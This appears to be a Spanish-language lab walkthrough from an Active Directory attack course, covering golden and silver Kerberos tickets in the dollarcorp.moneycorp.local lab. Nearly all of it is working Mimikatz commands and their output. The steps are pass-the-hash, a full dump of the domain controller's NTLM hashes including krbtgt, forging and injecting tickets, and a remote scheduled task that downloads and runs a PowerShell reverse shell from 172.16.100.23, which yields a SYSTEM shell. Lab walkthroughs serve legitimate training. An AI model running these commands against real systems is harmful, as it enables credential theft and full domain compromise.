Learning Objective - 8 y 9

Golden ticket

Creamos una sesion utilizando el DA desde cualquier computador utilizando Mimikatz.

PS C:\AD\Tools> .\mimikatz.exe

  .#####.   mimikatz 2.2.0 (x64) #19041 Dec 23 2022 16:49:51
 .## ^ ##.  "A La Vie, A L'Amour" - (oe.eo)
 ## / \ ##  /*** Benjamin DELPY `gentilkiwi` ( [email protected] )
 ## \ / ##       > https://blog.gentilkiwi.com/mimikatz
 '## v ##'       Vincent LE TOUX             ( [email protected] )
  '#####'        > https://pingcastle.com / https://mysmartlogon.com ***/

mimikatz # privilege::debug
Privilege '20' OK

mimikatz # sekurlsa::pth /user:Administrator /domain:dollarcorp.moneycorp.local /ntlm:af0686cc0ca8f04df42210c9ac980760
user    : Administrator
domain  : dollarcorp.moneycorp.local
program : cmd.exe
impers. : no
NTLM    : af0686cc0ca8f04df42210c9ac980760
  |  PID  5128
  |  TID  4660
  |  LSA Process is now R/W
  |  LUID 0 ; 41699318 (00000000:027c47f6)
  \_ msv1_0   - data copy @ 00000216750E60F0 : OK !
  \_ kerberos - data copy @ 00000216753FB7C8
   \_ aes256_hmac       -> null
   \_ aes128_hmac       -> null
   \_ rc4_hmac_nt       OK
   \_ rc4_hmac_old      OK
   \_ rc4_md4           OK
   \_ rc4_hmac_nt_exp   OK
   \_ rc4_hmac_old_exp  OK
   \_ *Password replace @ 0000021675AEF428 (32) -> null

mimikatz #

Luego en la consola generada, importamos el Invoke Mimikatz y realizamos la obtencion de los hashes del usuario krbgt.

PS C:\AD\Tools> . .\Invoke-Mimikatz.ps1
PS C:\AD\Tools> Invoke-Mimikatz -Command '"lsadump::lsa /patch"' -Computername dcorp-dc

  .#####.   mimikatz 2.2.0 (x64) #19041 Sep 20 2021 19:01:18
 .## ^ ##.  "A La Vie, A L'Amour" - (oe.eo)
 ## / \ ##  /*** Benjamin DELPY `gentilkiwi` ( [email protected] )
 ## \ / ##       > https://blog.gentilkiwi.com/mimikatz
 '## v ##'       Vincent LE TOUX             ( [email protected] )
  '#####'        > https://pingcastle.com / https://mysmartlogon.com ***/

mimikatz(powershell) # lsadump::lsa /patch
Domain : dcorp / S-1-5-21-719815819-3726368948-3917688648

RID  : 000001f4 (500)
User : Administrator
LM   :
NTLM : af0686cc0ca8f04df42210c9ac980760

RID  : 000001f5 (501)
User : Guest
LM   :
NTLM :

RID  : 000001f6 (502)
User : krbtgt
LM   :
NTLM : 4e9815869d2090ccfca61c1fe0d23986

RID  : 00000459 (1113)
User : sqladmin
LM   :
NTLM : 07e8be316e3da9a042a9cb681df19bf5

RID  : 0000045a (1114)
User : websvc
LM   :
NTLM : cc098f204c5887eaa8253e7c2749156f

RID  : 0000045b (1115)
User : srvadmin
LM   :
NTLM : a98e18228819e8eec3dfa33cb68b0728

RID  : 0000045d (1117)
User : appadmin
LM   :
NTLM : d549831a955fee51a43c83efb3928fa7

RID  : 0000045e (1118)
User : svcadmin
LM   :
NTLM : b38ff50264b74508085d82c69794a4d8

RID  : 0000045f (1119)
User : testda
LM   :
NTLM : a16452f790729fa34e8f3a08f234a82c

RID  : 00000460 (1120)
User : mgmtadmin
LM   :
NTLM : 95e2cd7ff77379e34c6e46265e75d754

RID  : 00000461 (1121)
User : ciadmin
LM   :
NTLM : e08253add90dccf1a208523d02998c3d

RID  : 00000462 (1122)
User : sql1admin
LM   :
NTLM : e999ae4bd06932620a1e78d2112138c6

RID  : 00001055 (4181)
User : studentadmin
LM   :
NTLM : d1254f303421d3cdbdc4c73a5bce0201

RID  : 00003521 (13601)
User : student721
LM   :
NTLM : c72c376699f31f096b2d5ab64cbdcd94

RID  : 00003522 (13602)
User : student722
LM   :
NTLM : d24ea4c7d485b9db9033c58cf221c900

RID  : 00003523 (13603)
User : student723
LM   :
NTLM : e602f8c5d4a53971a58774eb4db1bdf0

RID  : 00003524 (13604)
User : student724
LM   :
NTLM : 910d4b954db17832138473b090abb337

RID  : 00003525 (13605)
User : student725
LM   :
NTLM : ddaeb719bb3ebaf44f273cf302965f5a

RID  : 00003526 (13606)
User : student726
LM   :
NTLM : 12a836992d9a17bc71aafe08c58a2657

RID  : 00003527 (13607)
User : student727
LM   :
NTLM : d99bd8f6b5a4522f5ca082969f1479c4

RID  : 00003528 (13608)
User : student728
LM   :
NTLM : 9d50c933c86d072edb0815f82e6a5baf

RID  : 00003529 (13609)
User : student729
LM   :
NTLM : e1a081574f45f39d561e9dda3a918a14

RID  : 0000352a (13610)
User : student730
LM   :
NTLM : 9af9ad18e24b91eb4a0116ec8df5a27f

RID  : 0000352b (13611)
User : student731
LM   :
NTLM : 1f1c0cf05907d2bd7e863a7fe55c45b0

RID  : 0000352c (13612)
User : student732
LM   :
NTLM : c2ddcf1a32f71dce214be2cca9c04993

RID  : 0000352d (13613)
User : student733
LM   :
NTLM : e559ae80aaf6bcdc856b5df589f9d695

RID  : 0000352e (13614)
User : student734
LM   :
NTLM : b166b8e2d5dc7127002837197b3d24f4

RID  : 0000352f (13615)
User : student735
LM   :
NTLM : 2c289e4aee543d3ce0b4d65eb5518ad2

RID  : 00003530 (13616)
User : student736
LM   :
NTLM : 99af9ba03d340bdb9ea572cbf0b58406

RID  : 00003531 (13617)
User : student737
LM   :
NTLM : f3f3922ead678ca56a8319ef7adb6bff

RID  : 00003532 (13618)
User : student738
LM   :
NTLM : 9b8e48d74a130fc0d1865405cf2aaba6

RID  : 00003533 (13619)
User : student739
LM   :
NTLM : a39339b2e182046b60232f0478d6a0a4

RID  : 00003534 (13620)
User : student740
LM   :
NTLM : 483e63bc5ecb5d9026f689946eaaf87c

RID  : 00003535 (13621)
User : Control721user
LM   :
NTLM : c8aed8673aca42f9a83ff8d2c84860f0

RID  : 00003536 (13622)
User : Control722user
LM   :
NTLM : c8aed8673aca42f9a83ff8d2c84860f0

RID  : 00003537 (13623)
User : Control723user
LM   :
NTLM : c8aed8673aca42f9a83ff8d2c84860f0

RID  : 00003538 (13624)
User : Control724user
LM   :
NTLM : c8aed8673aca42f9a83ff8d2c84860f0

RID  : 00003539 (13625)
User : Control725user
LM   :
NTLM : c8aed8673aca42f9a83ff8d2c84860f0

RID  : 0000353a (13626)
User : Control726user
LM   :
NTLM : c8aed8673aca42f9a83ff8d2c84860f0

RID  : 0000353b (13627)
User : Control727user
LM   :
NTLM : c8aed8673aca42f9a83ff8d2c84860f0

RID  : 0000353c (13628)
User : Control728user
LM   :
NTLM : c8aed8673aca42f9a83ff8d2c84860f0

RID  : 0000353d (13629)
User : Control729user
LM   :
NTLM : c8aed8673aca42f9a83ff8d2c84860f0

RID  : 0000353e (13630)
User : Control730user
LM   :
NTLM : c8aed8673aca42f9a83ff8d2c84860f0

RID  : 0000353f (13631)
User : Control731user
LM   :
NTLM : c8aed8673aca42f9a83ff8d2c84860f0

RID  : 00003540 (13632)
User : Control732user
LM   :
NTLM : c8aed8673aca42f9a83ff8d2c84860f0

RID  : 00003541 (13633)
User : Control733user
LM   :
NTLM : c8aed8673aca42f9a83ff8d2c84860f0

RID  : 00003542 (13634)
User : Control734user
LM   :
NTLM : c8aed8673aca42f9a83ff8d2c84860f0

RID  : 00003543 (13635)
User : Control735user
LM   :
NTLM : c8aed8673aca42f9a83ff8d2c84860f0

RID  : 00003544 (13636)
User : Control736user
LM   :
NTLM : c8aed8673aca42f9a83ff8d2c84860f0

RID  : 00003545 (13637)
User : Control737user
LM   :
NTLM : c8aed8673aca42f9a83ff8d2c84860f0

RID  : 00003546 (13638)
User : Control738user
LM   :
NTLM : c8aed8673aca42f9a83ff8d2c84860f0

RID  : 00003547 (13639)
User : Control739user
LM   :
NTLM : c8aed8673aca42f9a83ff8d2c84860f0

RID  : 00003548 (13640)
User : Control740user
LM   :
NTLM : c8aed8673aca42f9a83ff8d2c84860f0

RID  : 00003549 (13641)
User : Support721user
LM   :
NTLM : b2e40f5d46efcbb1094704aeb7d9cbe7

RID  : 0000354a (13642)
User : Support722user
LM   :
NTLM : b2e40f5d46efcbb1094704aeb7d9cbe7

RID  : 0000354b (13643)
User : Support723user
LM   :
NTLM : b2e40f5d46efcbb1094704aeb7d9cbe7

RID  : 0000354c (13644)
User : Support724user
LM   :
NTLM : b2e40f5d46efcbb1094704aeb7d9cbe7

RID  : 0000354d (13645)
User : Support725user
LM   :
NTLM : b2e40f5d46efcbb1094704aeb7d9cbe7

RID  : 0000354e (13646)
User : Support726user
LM   :
NTLM : b2e40f5d46efcbb1094704aeb7d9cbe7

RID  : 0000354f (13647)
User : Support727user
LM   :
NTLM : b2e40f5d46efcbb1094704aeb7d9cbe7

RID  : 00003550 (13648)
User : Support728user
LM   :
NTLM : b2e40f5d46efcbb1094704aeb7d9cbe7

RID  : 00003551 (13649)
User : Support729user
LM   :
NTLM : b2e40f5d46efcbb1094704aeb7d9cbe7

RID  : 00003552 (13650)
User : Support730user
LM   :
NTLM : b2e40f5d46efcbb1094704aeb7d9cbe7

RID  : 00003553 (13651)
User : Support731user
LM   :
NTLM : b2e40f5d46efcbb1094704aeb7d9cbe7

RID  : 00003554 (13652)
User : Support732user
LM   :
NTLM : b2e40f5d46efcbb1094704aeb7d9cbe7

RID  : 00003555 (13653)
User : Support733user
LM   :
NTLM : b2e40f5d46efcbb1094704aeb7d9cbe7

RID  : 00003556 (13654)
User : Support734user
LM   :
NTLM : b2e40f5d46efcbb1094704aeb7d9cbe7

RID  : 00003557 (13655)
User : Support735user
LM   :
NTLM : b2e40f5d46efcbb1094704aeb7d9cbe7

RID  : 00003558 (13656)
User : Support736user
LM   :
NTLM : b2e40f5d46efcbb1094704aeb7d9cbe7

RID  : 00003559 (13657)
User : Support737user
LM   :
NTLM : b2e40f5d46efcbb1094704aeb7d9cbe7

RID  : 0000355a (13658)
User : Support738user
LM   :
NTLM : b2e40f5d46efcbb1094704aeb7d9cbe7

RID  : 0000355b (13659)
User : Support739user
LM   :
NTLM : b2e40f5d46efcbb1094704aeb7d9cbe7

RID  : 0000355c (13660)
User : Support740user
LM   :
NTLM : b2e40f5d46efcbb1094704aeb7d9cbe7

RID  : 0000355d (13661)
User : VPN721user
LM   :
NTLM : bb1d7a9ac6d4f535e1986ddbc5428881

RID  : 0000355e (13662)
User : VPN722user
LM   :
NTLM : bb1d7a9ac6d4f535e1986ddbc5428881

RID  : 0000355f (13663)
User : VPN723user
LM   :
NTLM : bb1d7a9ac6d4f535e1986ddbc5428881

RID  : 00003560 (13664)
User : VPN724user
LM   :
NTLM : bb1d7a9ac6d4f535e1986ddbc5428881

RID  : 00003561 (13665)
User : VPN725user
LM   :
NTLM : bb1d7a9ac6d4f535e1986ddbc5428881

RID  : 00003562 (13666)
User : VPN726user
LM   :
NTLM : bb1d7a9ac6d4f535e1986ddbc5428881

RID  : 00003563 (13667)
User : VPN727user
LM   :
NTLM : bb1d7a9ac6d4f535e1986ddbc5428881

RID  : 00003564 (13668)
User : VPN728user
LM   :
NTLM : bb1d7a9ac6d4f535e1986ddbc5428881

RID  : 00003565 (13669)
User : VPN729user
LM   :
NTLM : bb1d7a9ac6d4f535e1986ddbc5428881

RID  : 00003566 (13670)
User : VPN730user
LM   :
NTLM : bb1d7a9ac6d4f535e1986ddbc5428881

RID  : 00003567 (13671)
User : VPN731user
LM   :
NTLM : bb1d7a9ac6d4f535e1986ddbc5428881

RID  : 00003568 (13672)
User : VPN732user
LM   :
NTLM : bb1d7a9ac6d4f535e1986ddbc5428881

RID  : 00003569 (13673)
User : VPN733user
LM   :
NTLM : bb1d7a9ac6d4f535e1986ddbc5428881

RID  : 0000356a (13674)
User : VPN734user
LM   :
NTLM : bb1d7a9ac6d4f535e1986ddbc5428881

RID  : 0000356b (13675)
User : VPN735user
LM   :
NTLM : bb1d7a9ac6d4f535e1986ddbc5428881

RID  : 0000356c (13676)
User : VPN736user
LM   :
NTLM : bb1d7a9ac6d4f535e1986ddbc5428881

RID  : 0000356d (13677)
User : VPN737user
LM   :
NTLM : bb1d7a9ac6d4f535e1986ddbc5428881

RID  : 0000356e (13678)
User : VPN738user
LM   :
NTLM : bb1d7a9ac6d4f535e1986ddbc5428881

RID  : 0000356f (13679)
User : VPN739user
LM   :
NTLM : bb1d7a9ac6d4f535e1986ddbc5428881

RID  : 00003570 (13680)
User : VPN740user
LM   :
NTLM : bb1d7a9ac6d4f535e1986ddbc5428881

RID  : 000003e8 (1000)
User : DCORP-DC$
LM   :
NTLM : ef7a661f7edb7f5a1be191640342d6b7

RID  : 00000451 (1105)
User : DCORP-ADMINSRV$
LM   :
NTLM : b5f451985fd34d58d5120816d31b5565

RID  : 00000452 (1106)
User : DCORP-APPSRV$
LM   :
NTLM : b4cb7bf8b93c78b8051c7906bb054dc5

RID  : 00000453 (1107)
User : DCORP-CI$
LM   :
NTLM : f76f48c176dc09cfd5765843c32809f3

RID  : 00000454 (1108)
User : DCORP-MGMT$
LM   :
NTLM : 0878da540f45b31b974f73312c18e754

RID  : 00000455 (1109)
User : DCORP-MSSQL$
LM   :
NTLM : b205f1ca05bedace801893d6aa5aca27

RID  : 00000456 (1110)
User : DCORP-SQL1$
LM   :
NTLM : 3686dfb420dc0f9635e70c6ca5875b49

RID  : 0000106a (4202)
User : DCORP-STDADMIN$
LM   :
NTLM : e444bbf444732fc38065ea9e9255ab03

RID  : 00003571 (13681)
User : DCORP-STD721$
LM   :
NTLM : b9fed91f5f32818fae2271b05f189926

RID  : 00003572 (13682)
User : DCORP-STD722$
LM   :
NTLM : 2b04543bc07afe3966ff85e06f0a9412

RID  : 00003573 (13683)
User : DCORP-STD724$
LM   :
NTLM : e80b06a0063459999d702dc654312ea5

RID  : 00003574 (13684)
User : DCORP-STD723$
LM   :
NTLM : efd9824a276d26fcc5fc2ca14273225c

RID  : 00003575 (13685)
User : DCORP-STD726$
LM   :
NTLM : 05df9f9bc89dd594c5884e20ce1c683b

RID  : 00003576 (13686)
User : DCORP-STD729$
LM   :
NTLM : 03a26f64fd32b458ca55614c41bc5d80

RID  : 00003577 (13687)
User : DCORP-STD725$
LM   :
NTLM : 0783061c7d97c91b32b6f0c9b2a66c05

RID  : 00003578 (13688)
User : DCORP-STD728$
LM   :
NTLM : 43949d8590e999a5ca4b0eb369c6c620

RID  : 00003579 (13689)
User : DCORP-STD727$
LM   :
NTLM : a19a6642a51ee86db03d722bb2ae7930

RID  : 0000357a (13690)
User : DCORP-STD731$
LM   :
NTLM : e09c18c5b34fb9db4b4bd4e2bdc24c06

RID  : 0000357b (13691)
User : DCORP-STD732$
LM   :
NTLM : fcbf3df06ea9f5a0c0e9d9117bdb9d16

RID  : 0000357c (13692)
User : DCORP-STD730$
LM   :
NTLM : 3befa14afd532cc6faba9f0f9abb3128

RID  : 0000357d (13693)
User : DCORP-STD733$
LM   :
NTLM : e6fb50826836c584764b2e8275bedd9b

RID  : 0000357e (13694)
User : DCORP-STD735$
LM   :
NTLM : 8e5d039b8050c4e6d808ba7b904a107f

RID  : 0000357f (13695)
User : DCORP-STD734$
LM   :
NTLM : a68fa0eb1fa1d3da3a1e43f0e89049a3

RID  : 00003580 (13696)
User : DCORP-STD736$
LM   :
NTLM : 0267e3942c7d30950dba326f224f1882

RID  : 00003581 (13697)
User : DCORP-STD737$
LM   :
NTLM : 845002eccf7afd8343e818d2794d6556

RID  : 00003582 (13698)
User : DCORP-STD739$
LM   :
NTLM : 3070e58dbca650744068b1e120fefddc

RID  : 00003583 (13699)
User : DCORP-STD740$
LM   :
NTLM : b7bb22710be9d4a91bc42e7796ecd458

RID  : 00003584 (13700)
User : DCORP-STD738$
LM   :
NTLM : 6dc73ad2690d87a76bbd4a0ded74808d

RID  : 0000044f (1103)
User : mcorp$
LM   :
NTLM : f5b5c9f1ca76187393db1d3bb8ded94e

RID  : 00000450 (1104)
User : US$
LM   :
NTLM : f85385d81cc4936d37ff8f27813f43c6

RID  : 00000458 (1112)
User : ecorp$
LM   :
NTLM : 4501e4c7f30e1cb3c9886f06a3ed1c6a

Creando el golden ticket:

PS C:\AD\Tools\tickets> Invoke-Mimikatz -Command '"kerberos::golden /User:Administrator /domain:dollarcorp.moneycorp.local /sid:S-1-5-21-719815819-3726368948-3917688648 /rc4:4e9815869d2090ccfca61c1fe0d23986 /startoffset:0 /endin:600 /renewmax:10080 /ticket" "exit"'

  .#####.   mimikatz 2.2.0 (x64) #19041 Sep 20 2021 19:01:18
 .## ^ ##.  "A La Vie, A L'Amour" - (oe.eo)
 ## / \ ##  /*** Benjamin DELPY `gentilkiwi` ( [email protected] )
 ## \ / ##       > https://blog.gentilkiwi.com/mimikatz
 '## v ##'       Vincent LE TOUX             ( [email protected] )
  '#####'        > https://pingcastle.com / https://mysmartlogon.com ***/

mimikatz(powershell) # kerberos::golden /User:Administrator /domain:dollarcorp.moneycorp.local /sid:S-1-5-21-719815819-3726368948-3917688648 /rc4:4e9815869d2090ccfca61c1fe0d23986 /startoffset:0 /endin:600 /renewmax:10080 /ticket
User      : Administrator
Domain    : dollarcorp.moneycorp.local (DOLLARCORP)
SID       : S-1-5-21-719815819-3726368948-3917688648
User Id   : 500
Groups Id : *513 512 520 518 519
ServiceKey: 4e9815869d2090ccfca61c1fe0d23986 - rc4_hmac_nt
Lifetime  : 2/24/2024 1:13:24 AM ; 2/24/2024 11:13:24 AM ; 3/2/2024 1:13:24 AM
-> Ticket : ticket.kirbi

 * PAC generated
 * PAC signed
 * EncTicketPart generated
 * EncTicketPart encrypted
 * KrbCred generated

Final Ticket Saved to file !

mimikatz(powershell) # exit
Bye!

PS C:\AD\Tools\tickets> ls


    Directory: C:\AD\Tools\tickets


Mode                 LastWriteTime         Length Name
----                 -------------         ------ ----
-a----         2/24/2024   1:13 AM           1489 ticket.kirbi

Silver Ticket

Ejecutamos el comando para crear el silver ticket

PS C:\AD\Tools\tickets> Invoke-Mimikatz -Command '"kerberos::golden /User:Administrator /domain:dollarcorp.moneycorp.local /sid:S-1-5-21-719815819-3726368948-3917688648 /target:dcorp-dc.dollarcorp.moneycorp.local /service:HOST /rc4:ef7a661f7edb7f5a1be191640342d6b7 /startoffset:0 /endin:600 /renewmax:10080 /ticket" "exit"'

  .#####.   mimikatz 2.2.0 (x64) #19041 Sep 20 2021 19:01:18
 .## ^ ##.  "A La Vie, A L'Amour" - (oe.eo)
 ## / \ ##  /*** Benjamin DELPY `gentilkiwi` ( [email protected] )
 ## \ / ##       > https://blog.gentilkiwi.com/mimikatz
 '## v ##'       Vincent LE TOUX             ( [email protected] )
  '#####'        > https://pingcastle.com / https://mysmartlogon.com ***/

mimikatz(powershell) # kerberos::golden /User:Administrator /domain:dollarcorp.moneycorp.local /sid:S-1-5-21-719815819-3726368948-3917688648 /target:dcorp-dc.dollarcorp.moneycorp.local /service:HOST /rc4:ef7a661f7edb7f5a1be191640342d6b7 /startoffset:0 /endin:600 /renewmax:10080 /ticket
User      : Administrator
Domain    : dollarcorp.moneycorp.local (DOLLARCORP)
SID       : S-1-5-21-719815819-3726368948-3917688648
User Id   : 500
Groups Id : *513 512 520 518 519
ServiceKey: ef7a661f7edb7f5a1be191640342d6b7 - rc4_hmac_nt
Service   : HOST
Target    : dcorp-dc.dollarcorp.moneycorp.local
Lifetime  : 2/25/2024 2:22:44 PM ; 2/26/2024 12:22:44 AM ; 3/3/2024 2:22:44 PM
-> Ticket : ticket.kirbi

 * PAC generated
 * PAC signed
 * EncTicketPart generated
 * EncTicketPart encrypted
 * KrbCred generated

Final Ticket Saved to file !

mimikatz(powershell) # exit
Bye!

PS C:\AD\Tools\tickets> ls


    Directory: C:\AD\Tools\tickets


Mode                 LastWriteTime         Length Name
----                 -------------         ------ ----
-a----         2/24/2024   1:13 AM           1489 golden-ticket.kirbi
-a----         2/25/2024   2:22 PM           1503 ticket.kirbi

Importando ticket mimikatz

PS C:\AD\Tools\tickets> klist

Current LogonId is 0:0x17ce62

Cached Tickets: (0)
PS C:\AD\Tools\tickets> Invoke-Mimikatz -Command '"kerberos::ptt silver-ticket.kirbi" "exit"'

  .#####.   mimikatz 2.2.0 (x64) #19041 Sep 20 2021 19:01:18
 .## ^ ##.  "A La Vie, A L'Amour" - (oe.eo)
 ## / \ ##  /*** Benjamin DELPY `gentilkiwi` ( [email protected] )
 ## \ / ##       > https://blog.gentilkiwi.com/mimikatz
 '## v ##'       Vincent LE TOUX             ( [email protected] )
  '#####'        > https://pingcastle.com / https://mysmartlogon.com ***/

mimikatz(powershell) # kerberos::ptt silver-ticket.kirbi

* File: 'silver-ticket.kirbi': OK

mimikatz(powershell) # exit
Bye!

PS C:\AD\Tools\tickets> klist

Current LogonId is 0:0x17ce62

Cached Tickets: (1)

#0>     Client: Administrator @ dollarcorp.moneycorp.local
        Server: HOST/dcorp-dc.dollarcorp.moneycorp.local @ dollarcorp.moneycorp.local
        KerbTicket Encryption Type: RSADSI RC4-HMAC(NT)
        Ticket Flags 0x40a00000 -> forwardable renewable pre_authent
        Start Time: 2/25/2024 14:22:44 (local)
        End Time:   2/26/2024 0:22:44 (local)
        Renew Time: 3/3/2024 14:22:44 (local)
        Session Key Type: RSADSI RC4-HMAC(NT)
        Cache Flags: 0
        Kdc Called:
PS C:\AD\Tools\tickets>

Obteniendo Reverse tcp shell creando un Schedule Task con Silver Ticket

PS C:\AD\Tools\tickets> schtasks /create /S dcorp-dc.dollarcorp.moneycorp.local /SC Weekly /RU "NT Authority\SYSTEM" /TN "Tareita" /TR "powershell.exe -c 'iex (New-Object Net.WebClient).DownloadString(''http://172.16.100.23/Invoke-PowerShellTcp.ps1''')'"
SUCCESS: The scheduled task "Tareita" has successfully been created.

PS C:\AD\Tools\tickets> schtasks /Run /S dcorp-dc.dollarcorp.moneycorp.local /TN "Tareita"
SUCCESS: Attempted to run the scheduled task "Tareita".

C:\AD\Tools\netcat-win32-1.12>nc -lvp 6969
listening on [any] 6969 ...
172.16.2.1: inverse host lookup failed: h_errno 11004: NO_DATA
connect to [172.16.100.23] from (UNKNOWN) [172.16.2.1] 61506: NO_DATA
Windows PowerShell running as user DCORP-DC$ on DCORP-DC
Copyright (C) 2015 Microsoft Corporation. All rights reserved.

PS C:\Windows\system32>whoami
nt authority\system

PreviousLearning Objective - 7 NextLearning Objective - 10

Last updated 1 year ago